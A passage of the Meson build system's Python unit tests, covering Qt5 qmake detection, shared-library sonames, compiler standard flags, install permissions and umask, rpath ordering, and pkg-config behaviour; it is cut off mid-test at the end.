def test_qt5dependency_qmake_detection(self):
'''
Test that qt5 detection with qmake works. This can't be an ordinary
test case because it involves setting the environment.
'''
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt5'):
if not shutil.which('qmake'):
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 5' not in output:
raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
# Disable pkg-config codepath and force searching with qmake/qmake-qt5
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=qmake'])
# Confirm that the dependency was found with qmake
mesonlog = self.get_meson_log()
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES .* \((qmake|qmake-qt5)\)\n')
def glob_sofiles_without_privdir(self, g):
files = glob(g)
return [f for f in files if not f.endswith('.p')]
def _test_soname_impl(self, libpath, install):
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF and linuxlike sonames')
testdir = os.path.join(self.unit_test_dir, '1 soname')
self.init(testdir)
self.build()
if install:
self.install()
# File without aliases set.
nover = os.path.join(libpath, 'libnover.so')
self.assertPathExists(nover)
self.assertFalse(os.path.islink(nover))
self.assertEqual(get_soname(nover), 'libnover.so')
self.assertEqual(len(self.glob_sofiles_without_privdir(nover[:-3] + '*')), 1)
# File with version set
verset = os.path.join(libpath, 'libverset.so')
self.assertPathExists(verset + '.4.5.6')
self.assertEqual(os.readlink(verset), 'libverset.so.4')
self.assertEqual(get_soname(verset), 'libverset.so.4')
self.assertEqual(len(self.glob_sofiles_without_privdir(verset[:-3] + '*')), 3)
# File with soversion set
soverset = os.path.join(libpath, 'libsoverset.so')
self.assertPathExists(soverset + '.1.2.3')
self.assertEqual(os.readlink(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(get_soname(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(len(self.glob_sofiles_without_privdir(soverset[:-3] + '*')), 2)
# File with version and soversion set to same values
settosame = os.path.join(libpath, 'libsettosame.so')
self.assertPathExists(settosame + '.7.8.9')
self.assertEqual(os.readlink(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(get_soname(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(len(self.glob_sofiles_without_privdir(settosame[:-3] + '*')), 2)
# File with version and soversion set to different values
bothset = os.path.join(libpath, 'libbothset.so')
self.assertPathExists(bothset + '.1.2.3')
self.assertEqual(os.readlink(bothset), 'libbothset.so.1.2.3')
self.assertEqual(os.readlink(bothset + '.1.2.3'), 'libbothset.so.4.5.6')
self.assertEqual(get_soname(bothset), 'libbothset.so.1.2.3')
self.assertEqual(len(self.glob_sofiles_without_privdir(bothset[:-3] + '*')), 3)
def test_soname(self):
self._test_soname_impl(self.builddir, False)
def test_installed_soname(self):
libdir = self.installdir + os.path.join(self.prefix, self.libdir)
self._test_soname_impl(libdir, True)
def test_compiler_check_flags_order(self):
'''
Test that compiler check flags override all other flags. This can't be
an ordinary test case because it needs the environment to be set.
'''
testdir = os.path.join(self.common_test_dir, '39 has function')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
Oflag = '-O3'
OflagCPP = Oflag
if cpp.get_id() in ('clang', 'gcc'):
# prevent developers from adding "int main(int argc, char **argv)"
# to small Meson checks unless these parameters are actually used
OflagCPP += ' -Werror=unused-parameter'
env = {'CFLAGS': Oflag,
'CXXFLAGS': OflagCPP}
self.init(testdir, override_envvars=env)
cmds = self.get_meson_log_compiler_checks()
for cmd in cmds:
if cmd[0] == 'ccache':
cmd = cmd[1:]
# Verify that -I flags from the `args` kwarg are first
# This is set in the '39 has function' test case
self.assertEqual(cmd[1], '-I/tmp')
# Verify that -O3 set via the environment is overridden by -O0
Oargs = [arg for arg in cmd if arg.startswith('-O')]
self.assertEqual(Oargs, [Oflag, '-O0'])
def _test_stds_impl(self, testdir, compiler, p: str):
has_cpp17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=5.0.0', '>=9.1') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=5.0.0'))
has_cpp2a_c17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=6.0.0', '>=10.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
has_c18 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=8.0.0', '>=11.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
# Check that all the listed -std=xxx options for this compiler work just fine when used
# https://en.wikipedia.org/wiki/Xcode#Latest_versions
# https://www.gnu.org/software/gcc/projects/cxx-status.html
for v in compiler.get_options()['std'].choices:
lang_std = p + '_std'
# we do it like this to handle gnu++17,c++17 and gnu17,c17 cleanly
# thus, C++ first
if '++17' in v and not has_cpp17:
continue
elif '++2a' in v and not has_cpp2a_c17: # https://en.cppreference.com/w/cpp/compiler_support
continue
# now C
elif '17' in v and not has_cpp2a_c17:
continue
elif '18' in v and not has_c18:
continue
std_opt = '{}={}'.format(lang_std, v)
self.init(testdir, extra_args=['-D' + std_opt])
cmd = self.get_compdb()[0]['command']
# c++03 and gnu++03 are not understood by ICC, don't try to look for them
skiplist = frozenset([
('intel', 'c++03'),
('intel', 'gnu++03')])
if v != 'none' and not (compiler.get_id(), v) in skiplist:
cmd_std = " -std={} ".format(v)
self.assertIn(cmd_std, cmd)
try:
self.build()
except Exception:
print('{} was {!r}'.format(lang_std, v))
raise
self.wipe()
# Check that an invalid std option in CFLAGS/CPPFLAGS fails
# Needed because by default ICC ignores invalid options
cmd_std = '-std=FAIL'
if p == 'c':
env_flag_name = 'CFLAGS'
elif p == 'cpp':
env_flag_name = 'CXXFLAGS'
else:
raise NotImplementedError('Language {} not defined.'.format(p))
env = {}
env[env_flag_name] = cmd_std
with self.assertRaises((subprocess.CalledProcessError, mesonbuild.mesonlib.EnvironmentException),
msg='C compiler should have failed with -std=FAIL'):
self.init(testdir, override_envvars = env)
# ICC won't fail in the above because additional flags are needed to
# make unknown -std=... options errors.
self.build()
def test_compiler_c_stds(self):
'''
Test that C stds specified for this compiler can all be used. Can't be
an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cc, 'c')
def test_compiler_cpp_stds(self):
'''
Test that C++ stds specified for this compiler can all be used. Can't
be an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '2 cpp')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cpp, 'cpp')
def test_unity_subproj(self):
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir, extra_args='--unity=subprojects')
pdirs = glob(os.path.join(self.builddir, 'subprojects/sublib/simpletest*.p'))
self.assertEqual(len(pdirs), 1)
self.assertPathExists(os.path.join(pdirs[0], 'simpletest-unity0.c'))
sdirs = glob(os.path.join(self.builddir, 'subprojects/sublib/*sublib*.p'))
self.assertEqual(len(sdirs), 1)
self.assertPathExists(os.path.join(sdirs[0], 'sublib-unity0.c'))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'user@exe/user-unity.c'))
self.build()
def test_installed_modes(self):
'''
Test that files installed by these tests have the correct permissions.
Can't be an ordinary test because our installed_files.txt is very basic.
'''
# Test file modes
testdir = os.path.join(self.common_test_dir, '12 data')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'etc', 'etcfile.dat')
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'rw------T'
self.assertEqual(want_mode, found_mode[1:])
f = os.path.join(self.installdir, 'usr', 'bin', 'runscript.sh')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-sr-x'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_uid)
self.assertEqual(0, statf.st_gid)
f = os.path.join(self.installdir, 'usr', 'share', 'progname',
'fileobject_datafile.dat')
orig = os.path.join(testdir, 'fileobject_datafile.dat')
statf = os.stat(f)
statorig = os.stat(orig)
found_mode = stat.filemode(statf.st_mode)
orig_mode = stat.filemode(statorig.st_mode)
self.assertEqual(orig_mode[1:], found_mode[1:])
self.assertEqual(os.getuid(), statf.st_uid)
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_gid)
self.wipe()
# Test directory modes
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'usr', 'share', 'sub1', 'second.dat')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-x--t'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_uid)
def test_installed_modes_extended(self):
'''
Test that files are installed with correct permissions using install_mode.
'''
testdir = os.path.join(self.common_test_dir, '195 install_mode')
self.init(testdir)
self.build()
self.install()
for fsobj, want_mode in [
('bin', 'drwxr-x---'),
('bin/runscript.sh', '-rwxr-sr-x'),
('bin/trivialprog', '-rwxr-sr-x'),
('include', 'drwxr-x---'),
('include/config.h', '-rw-rwSr--'),
('include/rootdir.h', '-r--r--r-T'),
('lib', 'drwxr-x---'),
('lib/libstat.a', '-rw---Sr--'),
('share', 'drwxr-x---'),
('share/man', 'drwxr-x---'),
('share/man/man1', 'drwxr-x---'),
('share/man/man1/foo.1', '-r--r--r-T'),
('share/sub1', 'drwxr-x---'),
('share/sub1/second.dat', '-rwxr-x--t'),
('subdir', 'drwxr-x---'),
('subdir/data.dat', '-rw-rwSr--'),
]:
f = os.path.join(self.installdir, 'usr', *fsobj.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(fsobj, want_mode, found_mode)))
# Ensure that introspect --installed works on all types of files
# FIXME: also verify the files list
self.introspect('--installed')
def test_install_umask(self):
'''
Test that files are installed with correct permissions using default
install umask of 022, regardless of the umask at time the worktree
was checked out or the build was executed.
'''
# Copy source tree to a temporary directory and change permissions
# there to simulate a checkout with umask 002.
orig_testdir = os.path.join(self.unit_test_dir, '26 install umask')
# Create a new testdir under tmpdir.
tmpdir = os.path.realpath(tempfile.mkdtemp())
self.addCleanup(windows_proof_rmtree, tmpdir)
testdir = os.path.join(tmpdir, '26 install umask')
# Copy the tree using shutil.copyfile, which will use the current umask
# instead of preserving permissions of the old tree.
save_umask = os.umask(0o002)
self.addCleanup(os.umask, save_umask)
shutil.copytree(orig_testdir, testdir, copy_function=shutil.copyfile)
# Preserve the executable status of subdir/sayhello though.
os.chmod(os.path.join(testdir, 'subdir', 'sayhello'), 0o775)
self.init(testdir)
# Run the build under a 027 umask now.
os.umask(0o027)
self.build()
# And keep umask 027 for the install step too.
self.install()
for executable in [
'bin/prog',
'share/subdir/sayhello',
]:
f = os.path.join(self.installdir, 'usr', *executable.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(executable, want_mode, found_mode)))
for directory in [
'usr',
'usr/bin',
'usr/include',
'usr/share',
'usr/share/man',
'usr/share/man/man1',
'usr/share/subdir',
]:
f = os.path.join(self.installdir, *directory.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'drwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected directory %s to have mode %s but found %s instead.' %
(directory, want_mode, found_mode)))
for datafile in [
'include/sample.h',
'share/datafile.cat',
'share/file.dat',
'share/man/man1/prog.1',
'share/subdir/datafile.dog',
]:
f = os.path.join(self.installdir, 'usr', *datafile.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rw-r--r--'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(datafile, want_mode, found_mode)))
def test_cpp_std_override(self):
testdir = os.path.join(self.unit_test_dir, '6 std override')
self.init(testdir)
compdb = self.get_compdb()
# Don't try to use -std=c++03 as a check for the
# presence of a compiler flag, as ICC does not
# support it.
for i in compdb:
if 'prog98' in i['file']:
c98_comp = i['command']
if 'prog11' in i['file']:
c11_comp = i['command']
if 'progp' in i['file']:
plain_comp = i['command']
self.assertNotEqual(len(plain_comp), 0)
self.assertIn('-std=c++98', c98_comp)
self.assertNotIn('-std=c++11', c98_comp)
self.assertIn('-std=c++11', c11_comp)
self.assertNotIn('-std=c++98', c11_comp)
self.assertNotIn('-std=c++98', plain_comp)
self.assertNotIn('-std=c++11', plain_comp)
# Now werror
self.assertIn('-Werror', plain_comp)
self.assertNotIn('-Werror', c98_comp)
def test_run_installed(self):
if is_cygwin() or is_osx():
raise unittest.SkipTest('LD_LIBRARY_PATH and RPATH not applicable')
testdir = os.path.join(self.unit_test_dir, '7 run installed')
self.init(testdir)
self.build()
self.install()
installed_exe = os.path.join(self.installdir, 'usr/bin/prog')
installed_libdir = os.path.join(self.installdir, 'usr/foo')
installed_lib = os.path.join(installed_libdir, 'libfoo.so')
self.assertTrue(os.path.isfile(installed_exe))
self.assertTrue(os.path.isdir(installed_libdir))
self.assertTrue(os.path.isfile(installed_lib))
# Must fail when run without LD_LIBRARY_PATH to ensure that
# rpath has been properly stripped rather than pointing to the builddir.
self.assertNotEqual(subprocess.call(installed_exe, stderr=subprocess.DEVNULL), 0)
# When LD_LIBRARY_PATH is set it should start working.
# For some reason setting LD_LIBRARY_PATH in os.environ fails
# when all tests are run (but works when only this test is run),
# but doing this explicitly works.
env = os.environ.copy()
env['LD_LIBRARY_PATH'] = ':'.join([installed_libdir, env.get('LD_LIBRARY_PATH', '')])
self.assertEqual(subprocess.call(installed_exe, env=env), 0)
# Ensure that introspect --installed works
installed = self.introspect('--installed')
for v in installed.values():
self.assertTrue('prog' in v or 'foo' in v)
@skipIfNoPkgconfig
def test_order_of_l_arguments(self):
testdir = os.path.join(self.unit_test_dir, '8 -L -l order')
self.init(testdir, override_envvars={'PKG_CONFIG_PATH': testdir})
# NOTE: .pc file has -Lfoo -lfoo -Lbar -lbar but pkg-config reorders
# the flags before returning them to -Lfoo -Lbar -lfoo -lbar
# but pkgconf seems to not do that. Sigh. Support both.
expected_order = [('-L/me/first', '-lfoo1'),
('-L/me/second', '-lfoo2'),
('-L/me/first', '-L/me/second'),
('-lfoo1', '-lfoo2'),
('-L/me/second', '-L/me/third'),
('-L/me/third', '-L/me/fourth',),
('-L/me/third', '-lfoo3'),
('-L/me/fourth', '-lfoo4'),
('-lfoo3', '-lfoo4'),
]
with open(os.path.join(self.builddir, 'build.ninja')) as ifile:
for line in ifile:
if expected_order[0][0] in line:
for first, second in expected_order:
self.assertLess(line.index(first), line.index(second))
return
raise RuntimeError('Linker entries not found in the Ninja file.')
def test_introspect_dependencies(self):
'''
Tests that mesonintrospect --dependencies returns expected output.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir)
glib_found = False
gobject_found = False
deps = self.introspect('--dependencies')
self.assertIsInstance(deps, list)
for dep in deps:
self.assertIsInstance(dep, dict)
self.assertIn('name', dep)
self.assertIn('compile_args', dep)
self.assertIn('link_args', dep)
if dep['name'] == 'glib-2.0':
glib_found = True
elif dep['name'] == 'gobject-2.0':
gobject_found = True
self.assertTrue(glib_found)
self.assertTrue(gobject_found)
if subprocess.call(['pkg-config', '--exists', 'glib-2.0 >= 2.56.2']) != 0:
raise unittest.SkipTest('glib >= 2.56.2 needed for the rest')
targets = self.introspect('--targets')
docbook_target = None
for t in targets:
if t['name'] == 'generated-gdbus-docbook':
docbook_target = t
break
self.assertIsInstance(docbook_target, dict)
self.assertEqual(os.path.basename(t['filename'][0]), 'generated-gdbus-doc-' + os.path.basename(t['target_sources'][0]['sources'][0]))
def test_introspect_installed(self):
testdir = os.path.join(self.linuxlike_test_dir, '7 library versions')
self.init(testdir)
install = self.introspect('--installed')
install = {os.path.basename(k): v for k, v in install.items()}
print(install)
if is_osx():
the_truth = {
'libmodule.dylib': '/usr/lib/libmodule.dylib',
'libnoversion.dylib': '/usr/lib/libnoversion.dylib',
'libonlysoversion.5.dylib': '/usr/lib/libonlysoversion.5.dylib',
'libonlysoversion.dylib': '/usr/lib/libonlysoversion.dylib',
'libonlyversion.1.dylib': '/usr/lib/libonlyversion.1.dylib',
'libonlyversion.dylib': '/usr/lib/libonlyversion.dylib',
'libsome.0.dylib': '/usr/lib/libsome.0.dylib',
'libsome.dylib': '/usr/lib/libsome.dylib',
}
the_truth_2 = {'/usr/lib/libsome.dylib',
'/usr/lib/libsome.0.dylib',
}
else:
the_truth = {
'libmodule.so': '/usr/lib/libmodule.so',
'libnoversion.so': '/usr/lib/libnoversion.so',
'libonlysoversion.so': '/usr/lib/libonlysoversion.so',
'libonlysoversion.so.5': '/usr/lib/libonlysoversion.so.5',
'libonlyversion.so': '/usr/lib/libonlyversion.so',
'libonlyversion.so.1': '/usr/lib/libonlyversion.so.1',
'libonlyversion.so.1.4.5': '/usr/lib/libonlyversion.so.1.4.5',
'libsome.so': '/usr/lib/libsome.so',
'libsome.so.0': '/usr/lib/libsome.so.0',
'libsome.so.1.2.3': '/usr/lib/libsome.so.1.2.3',
}
the_truth_2 = {'/usr/lib/libsome.so',
'/usr/lib/libsome.so.0',
'/usr/lib/libsome.so.1.2.3'}
self.assertDictEqual(install, the_truth)
targets = self.introspect('--targets')
for t in targets:
if t['name'] != 'some':
continue
self.assertSetEqual(the_truth_2, set(t['install_filename']))
def test_build_rpath(self):
if is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
self.init(testdir)
self.build()
# C program RPATH
build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/prog'))
self.assertEqual(install_rpath, '/baz')
# C++ program RPATH
build_rpath = get_rpath(os.path.join(self.builddir, 'progcxx'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/progcxx'))
self.assertEqual(install_rpath, 'baz')
def test_global_rpath(self):
if is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
if is_osx():
raise unittest.SkipTest('Global RPATHs via LDFLAGS not yet supported on MacOS (does anybody need it?)')
testdir = os.path.join(self.unit_test_dir, '80 global-rpath')
oldinstalldir = self.installdir
# Build and install an external library without DESTDIR.
# The external library generates a .pc file without an rpath.
yonder_dir = os.path.join(testdir, 'yonder')
yonder_prefix = os.path.join(oldinstalldir, 'yonder')
yonder_libdir = os.path.join(yonder_prefix, self.libdir)
self.prefix = yonder_prefix
self.installdir = yonder_prefix
self.init(yonder_dir)
self.build()
self.install(use_destdir=False)
# Since rpath has multiple valid formats we need to
# test that they are all properly used.
rpath_formats = [
('-Wl,-rpath=', False),
('-Wl,-rpath,', False),
('-Wl,--just-symbols=', True),
('-Wl,--just-symbols,', True),
('-Wl,-R', False),
('-Wl,-R,', False)
]
for rpath_format, exception in rpath_formats:
# Build an app that uses that installed library.
# Supply the rpath to the installed library via LDFLAGS
# (as systems like buildroot and guix are wont to do)
# and verify install preserves that rpath.
self.new_builddir()
env = {'LDFLAGS': rpath_format + yonder_libdir,
'PKG_CONFIG_PATH': os.path.join(yonder_libdir, 'pkgconfig')}
if exception:
with self.assertRaises(subprocess.CalledProcessError):
self.init(testdir, override_envvars=env)
break
self.init(testdir, override_envvars=env)
self.build()
self.install(use_destdir=False)
got_rpath = get_rpath(os.path.join(yonder_prefix, 'bin/rpathified'))
self.assertEqual(got_rpath, yonder_libdir, rpath_format)
@skip_if_not_base_option('b_sanitize')
def test_pch_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.common_test_dir, '13 pch')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
compdb = self.get_compdb()
for i in compdb:
self.assertIn("-fsanitize=address", i["command"])
def test_cross_find_program(self):
testdir = os.path.join(self.unit_test_dir, '11 cross prog')
crossfile = tempfile.NamedTemporaryFile(mode='w')
print(os.path.join(testdir, 'some_cross_tool.py'))
crossfile.write(textwrap.dedent('''\
[binaries]
c = '/usr/bin/{1}'
ar = '/usr/bin/ar'
strip = '/usr/bin/ar'
sometool.py = ['{0}']
someothertool.py = '{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7' # Not sure if correct.
endian = 'little'
''').format(os.path.join(testdir, 'some_cross_tool.py'),
'gcc' if is_sunos() else 'cc'))
crossfile.flush()
self.meson_cross_file = crossfile.name
self.init(testdir)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '13 reconfigure')
self.init(testdir, extra_args=['-Db_coverage=true'], default_args=False)
self.build('reconfigure')
def test_vala_generated_source_buildir_inside_source_tree(self):
'''
Test that valac outputs generated C files in the expected location when
the builddir is a subdir of the source tree.
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '8 generated sources')
newdir = os.path.join(self.builddir, 'srctree')
shutil.copytree(testdir, newdir)
testdir = newdir
# New builddir
builddir = os.path.join(testdir, 'subdir/_build')
os.makedirs(builddir, exist_ok=True)
self.change_builddir(builddir)
self.init(testdir)
self.build()
def test_old_gnome_module_codepaths(self):
'''
A lot of code in the GNOME module is conditional on the version of the
glib tools that are installed, and breakages in the old code can slip
by once the CI has a newer glib version. So we force the GNOME module
to pretend that it's running on an ancient glib so the fallback code is
also tested.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
mesonbuild.modules.gnome.native_glib_version = '2.20'
env = {'MESON_UNIT_TEST_PRETEND_GLIB_OLD': "1"}
try:
self.init(testdir,
inprocess=True,
override_envvars=env)
self.build(override_envvars=env)
finally:
mesonbuild.modules.gnome.native_glib_version = None
@skipIfNoPkgconfig
def test_pkgconfig_usage(self):
testdir1 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependency')
testdir2 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependee')
if subprocess.call(['pkg-config', '--cflags', 'glib-2.0'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) != 0:
raise unittest.SkipTest('Glib 2.0 dependency not available.')
with tempfile.TemporaryDirectory() as tempdirname:
self.init(testdir1, extra_args=['--prefix=' + tempdirname, '--libdir=lib'], default_args=False)
self.install(use_destdir=False)
shutil.rmtree(self.builddir)
os.mkdir(self.builddir)
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'libpkgdep.pc')))
lib_dir = os.path.join(tempdirname, 'lib')
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = pkg_dir
# Private internal libraries must not leak out.
pkg_out = subprocess.check_output(['pkg-config', '--static', '--libs', 'libpkgdep'], env=myenv)
self.assertFalse(b'libpkgdep-int' in pkg_out, 'Internal library leaked out.')
# Dependencies must not leak to cflags when building only a shared library.
pkg_out = subprocess.check_output(['pkg-config', '--cflags', 'libpkgdep'], env=myenv)
self.assertFalse(b'glib' in pkg_out, 'Internal dependency leaked to headers.')
# Test that the result is usable.
self.init(testdir2, override_envvars=myenv)
self.build(override_envvars=myenv)
myenv = os.environ.copy()
myenv['LD_LIBRARY_PATH'] = ':'.join([lib_dir, myenv.get('LD_LIBRARY_PATH', '')])
if is_cygwin():
bin_dir = os.path.join(tempdirname, 'bin')
myenv['PATH'] = bin_dir + os.pathsep + myenv['PATH']
self.assertTrue(os.path.isdir(lib_dir))
test_exe = os.path.join(self.builddir, 'pkguser')
self.assertTrue(os.path.isfile(test_exe))
subprocess.check_call(test_exe, env=myenv)
@skipIfNoPkgconfig
def test_pkgconfig_relative_paths(self):
testdir = os.path.join(self.unit_test_dir, '62 pkgconfig relative paths')
pkg_dir = os.path.join(testdir, 'pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'librelativepath.pc')))
env = get_fake_env(testdir, self.builddir, self.prefix)
env.coredata.set_options({'pkg_config_path': pkg_dir}, subproject='')
kwargs = {'required': True, 'silent': True}
relative_path_dep = PkgConfigDependency('librelativepath', env, kwargs)
self.assertTrue(relative_path_dep.found())
# Ensure link_args are properly quoted
libpath = Path(self.builddir) / '../relativepath/lib'
link_args = ['-L' + libpath.as_posix(), '-lrelativepath']
self.assertEqual(relative_path_dep.get_link_args(), link_args)
@skipIfNoPkgconfig
def test_pkgconfig_internal_libraries(self):
'''
'''
with tempfile.TemporaryDirectory() as tempdirname:
# build library
testdirbase = os.path.join(self.unit_test_dir, '32 pkgconfig use libraries')
testdirlib = os.path.join(testdirbase, 'lib')
self.init(testdirlib, extra_args=['--prefix=' + tempdirname,
'--libdir=lib',
'--default-library=static'], default_args=False)
self.build()
self.install(use_destdir=False)
# build user of library
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_static_archive_stripping(self):
'''
Check that Meson produces valid static archives with --strip enabled
'''
with tempfile.TemporaryDirectory() as tempdirname:
testdirbase = os.path.join(self.unit_test_dir, '67 static archive stripping')
# build lib
self.new_builddir()
testdirlib = os.path.join(testdirbase, 'lib')
testlibprefix = os.path.join(tempdirname, 'libprefix')
self.init(testdirlib, extra_args=['--prefix=' + testlibprefix,
'--libdir=lib',
'--default-library=static',
'--buildtype=debug',
'--strip'], default_args=False)
self.build()
self.install(use_destdir=False)
# build executable (uses lib, fails if static archive has been stripped incorrectly)
pkg_dir = os.path.join(testlibprefix, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_pkgconfig_formatting(self):
testdir = os.path.join(self.unit_test_dir, '38 pkgconfig format')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs-only-l', 'libsomething'], env=myenv)
deps = [b'-lgobject-2.0', b'-lgio-2.0', b'-lglib-2.0', b'-lsomething']
if is_windows() or is_cygwin() or is_osx() or is_openbsd():
# On Windows, libintl is a separate library
deps.append(b'-lintl')
self.assertEqual(set(deps), set(stdo.split()))
@skipIfNoPkgconfig
@skip_if_not_language('cs')
def test_pkgconfig_csharp_library(self):
testdir = os.path.join(self.unit_test_dir, '50 pkgconfig csharp library')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
self.assertEqual("-r/usr/lib/libsomething.dll", str(stdo.decode('ascii')).strip())
@skipIfNoPkgconfig
def test_pkgconfig_link_order(self):
'''
Test that libraries are listed before their dependencies.
'''
testdir = os.path.join(self.unit_test_dir, '53 pkgconfig static link order')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
deps = stdo.split()
self.assertTrue(deps.index(b'-lsomething') < deps.index(b'-ldependency'))
def test_deterministic_dep_order(self):
'''
Test that the dependencies are always listed in a deterministic order.
'''
testdir = os.path.join(self.unit_test_dir, '43 dep order')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'build myexe:' in line or 'build myexe.exe:' in line:
self.assertIn('liblib1.a liblib2.a', line)
return
raise RuntimeError('Could not find the build rule')
def test_deterministic_rpath_order(self):
'''
Test that the rpaths are always listed in a deterministic order.
'''
if is_cygwin():
raise unittest.SkipTest('rpath are not used on Cygwin')
testdir = os.path.join(self.unit_test_dir, '42 rpath order')
self.init(testdir)
if is_osx():
rpathre = re.compile(r'-rpath,.*/subprojects/sub1.*-rpath,.*/subprojects/sub2')
else:
rpathre = re.compile(r'-rpath,\$\$ORIGIN/subprojects/sub1:\$\$ORIGIN/subprojects/sub2')
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if '-rpath' in line:
self.assertRegex(line, rpathre)
return
raise RuntimeError('Could not find the rpath')
def test_override_with_exe_dep(self):
'''
Test that we produce the correct dependencies when a program is overridden with an executable.
'''
testdir = os.path.join(self.common_test_dir, '201 override with exe')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'main1.c:' in line or 'main2.c:' in line:
self.assertIn('| subprojects/sub/foobar', line)
@skipIfNoPkgconfig
def test_usage_external_library(self):
'''
Test that uninstalled usage of an external library (from the system or
PkgConfigDependency) works. On macOS, this workflow works out of the
box. On Linux, BSDs, Windows, etc, you need to set extra arguments such
as LD_LIBRARY_PATH, etc, so this test is skipped.
The system library is found with cc.find_library() and pkg-config deps.
'''
oldprefix = self.prefix
# Install external library so we can find it
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'external library')
# install into installdir without using DESTDIR
installdir = self.installdir
self.prefix = installdir
